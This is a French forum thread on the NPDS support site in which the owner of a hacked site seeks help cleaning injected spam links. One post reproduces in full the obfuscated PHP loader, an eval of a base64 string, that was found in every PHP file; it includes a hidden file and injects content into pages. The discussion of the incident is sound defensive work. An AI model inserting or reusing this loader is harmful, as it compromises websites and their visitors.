NPDS : Gestion de contenu et de communauté
Content & Community Management System (CCMS) robuste, sécurisé, complet, performant, parlant vraiment français, libre (Open-Source) et gratuit.
34 visiteur(s) et 0 membre(s) en ligne.
Autres infos
Activité du Site
Pages vues depuis 25/05/2001 : 108 407 095
- Nb. de membres 8 693
- Nb. d'articles 1 695
- Nb. de forums 26
- Nb. de sujets 8
- Nb. de critiques 92
Index du forum »» Sécurité »» Forum.php piraté !
Nouveau sujet
Forum.php piraté !#24225Répondre
8Contributeur(s)
3 Modérateur(s)
cto
Bonjour,
Depuis peu, mon site NPDS en version Sable 5.10 est victime de piratage...
Exemple : http://cto.free.fr/forum.php
Vous y constaterez, que l'entête du fichier FORUM.PHP montre des lignes bizarres :
Comment éviter cela et les effacer ?
Je sais que vous allez me dire de passer à la dernière version mais j'ai beaucoup travaillé sur cette version et j'aimerais la conserver...
N'est-elle pas assez sécurisée ?
Merci d'avance...
Cyril.
Depuis peu, mon site NPDS en version Sable 5.10 est victime de piratage...
Exemple : http://cto.free.fr/forum.php
Vous y constaterez, que l'entête du fichier FORUM.PHP montre des lignes bizarres :
I DON T WANNA i don t wanna
LA QUINTA HOTEL IRVINE
la quinta hotel irvine
NEW JERSEY BRIDAL SHOWS
new jersey bridal shows
Comment éviter cela et les effacer ?
Je sais que vous allez me dire de passer à la dernière version mais j'ai beaucoup travaillé sur cette version et j'aimerais la conserver...
N'est-elle pas assez sécurisée ?
Merci d'avance...
Cyril.
cto
Précision : j'ai constaté que cela ne s'arrête pas à FORUM.PHP mais à l'ensemble du site :D
Cela devient urgent...
Que puis-je faire ?
Merci.
Cela devient urgent...
Que puis-je faire ?
Merci.
oim
Essaye de regarde tes logs, puis enleve tous les liens ajoutés et change tous tes MDP admin (pour être sur qu'il ne passe pas par un compte admin).
Et as-tu mis des modules non validés, ou des scripts "fait maison" ?
Et as-tu mis des modules non validés, ou des scripts "fait maison" ?
cto
Encore une précision :
Voici la ligne de code qui apparait dans tous mes fichiers PHP...
D'après l'archive originale cela version Sable, il semble que cela n'y soit pas.
Comment cela est-ce possible ?
++
<?php /**/eval(base_64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvbW50LzE1Mi9zZGEvMi8zL2N0by9lZGl0ZXVyL3RpbnlfbWNlL3RoZW1lcy9ucGRzL2RvY3MvZW5nbGlzaC9pbWFnZXMvY29wcGVyLnBocCcpKXtpbmNsdWRlX29uY2UoJy9tbnQvMTUyL3NkYS8yLzMvY3RvL2VkaXRldXIvdGlueV9tY2UvdGhlbWVzL25wZHMvZG9jcy9lbmdsaXNoL2ltYWdlcy9jb3BwZXIucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>
Voici la ligne de code qui apparait dans tous mes fichiers PHP...
D'après l'archive originale cela version Sable, il semble que cela n'y soit pas.
Comment cela est-ce possible ?
++
cto
Citation : oim
Essaye de regarde tes logs, puis enleve tous les liens ajoutés et change tous tes MDP admin (pour être sur qu'il ne passe pas par un compte admin).
Et as-tu mis des modules non validés, ou des scripts "fait maison" ?
Essaye de regarde tes logs, puis enleve tous les liens ajoutés et change tous tes MDP admin (pour être sur qu'il ne passe pas par un compte admin).
Et as-tu mis des modules non validés, ou des scripts "fait maison" ?
Mot de passe Admin changé, Root effacé, Logs vides :-?, aucun script maison...
je ne vois pas comment cela est possible...
++
mimit54
Bonjour,
J'ai eu la même attaque le 06/02 aves NPDS Evolution.
J'ai trouvé la solution, voir ce post
http://www.npds.org/viewtopic.php?topic=24181&forum=12
Par contre, je ne sais toujours pas, par où cela a pu arriver.
J'ai eu la même attaque le 06/02 aves NPDS Evolution.
J'ai trouvé la solution, voir ce post
http://www.npds.org/viewtopic.php?topic=24181&forum=12
Par contre, je ne sais toujours pas, par où cela a pu arriver.
Message édité par : mimit54 / 28-02-2009 13:32
Anonyme
Merci après avoir lu ton post, j'ai voulu accéder aux "Préférences" de mon site pour désactiver le "Gestionnaire de Fichiers" mais j'obtiens ce message d'erreur :
De mieux en mieux...
Warning: main(admin/settings.php) [function.main]: failed to open stream: No such file or directory in /mnt/152/sda/2/3/cto/admin.php on line 1228
Warning: main() [function.!include!]: Failed opening 'admin/settings.php' for inclusion (!include!_path='/mnt/152/sda/2/3/cto/!include!:.:/usr/php4/lib/php') in /mnt/152/sda/2/3/cto/admin.php on line 1228
De mieux en mieux...
cto
Anonyme it's me :=!
D'ailleurs, je n'accède à aucun menu Administrateur !!!
:-? :-? :-?
D'ailleurs, je n'accède à aucun menu Administrateur !!!
:-? :-? :-?
Message édité par : cto / 28-02-2009 14:06
cto
Je ne sais pas comment effacer tout ce code dans tous mes fichiers PHP, j'aimerais savoir faire cela : si ligne
Qq. pourrait-il m'aider ?
A cause de cela, mon site NPDS est complément pourri :paf:paf:paf
++
<?php /**/eval(base_64_decode('aWYoZnVuY3Rpb25..........O319fQ==')); ?>
est présent dans les fichiers du type PHP alors supprimer cette ligne où alors effacer de
<?php /**/eval(base_64_decode
à
O319fQ==')); ?>
...
Qq. pourrait-il m'aider ?
A cause de cela, mon site NPDS est complément pourri :paf:paf:paf
++
Message édité par : cto / 28-02-2009 14:58
cto
Citation : cto
Anonyme it's me :=!
D'ailleurs, je n'accède à aucun menu Administrateur !!!
:-? :-? :-?
Anonyme it's me :=!
D'ailleurs, je n'accède à aucun menu Administrateur !!!
:-? :-? :-?
Message édité par : cto / 28-02-2009 14:06
J'ai trouvé pour cela : le dossier "admin" à la racine avait disparu...
++
Message édité par : cto / 28-02-2009 16:26
cto
Je suis passé à Sable Evolution 08.06 et cela semble avoir réglé le pb.
J'essuie encore qq. bugs mais j'y travaille (recherches sur le forum)...
++
J'essuie encore qq. bugs mais j'y travaille (recherches sur le forum)...
++
mimit54
J'avais les mêmes lignes de texte avant le bandeau, mais uniquement pour la publication d'un article, l'apparition d'un formulaire demandant login et password si je voulais changer de thème et je ne sais plus trop où, et bien sûr comme toi cette ligne de code dans tous les fichiers PHP. Par contre pas de Pb admin .
Pour corriger:
Retrait du copper.php, et plus aucun souci, par précaution j'ai rechargé tous les fichiers PHP.
As tu localisé copper.php ?
Pour corriger:
Retrait du copper.php, et plus aucun souci, par précaution j'ai rechargé tous les fichiers PHP.
As tu localisé copper.php ?
cto
Je n'ai pas ce fichier...
Apparemment le bug était similaire au tien malgré cela je n'avais pas ce type de formulaire.
++
Apparemment le bug était similaire au tien malgré cela je n'avais pas ce type de formulaire.
++